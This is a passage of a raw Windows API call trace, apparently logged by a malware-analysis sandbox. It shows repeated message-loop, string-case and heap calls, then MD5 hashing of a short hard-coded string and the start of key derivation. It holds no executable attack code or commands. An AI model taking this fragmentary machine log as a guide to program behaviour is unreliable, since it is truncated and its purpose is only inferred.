wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.712] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0176.712] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.712] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0176.712] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.712] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0176.712] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.712] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0176.712] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.712] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0176.712] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.712] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0176.712] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.712] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.713] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.713] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.713] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.713] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.713] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0176.713] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.713] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0176.713] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.713] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0176.713] CryptCreateHash (in: hProv=0xa7c2a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0176.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75380 [0176.714] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0176.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0176.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0176.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0176.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0176.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0176.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0176.718] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0176.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b80 [0176.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0176.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0176.719] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69670 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0176.719] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0176.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0176.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0176.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0176.721] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.721] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0176.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0176.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0176.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2aaad68 [0176.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0176.722] CryptHashData (hHash=0x9e20f8, pbData=0x2a71b88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0176.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0176.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0176.722] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0176.723] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0176.723] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0176.723] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0176.723] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0176.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0176.724] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0176.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0176.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0176.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0176.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, 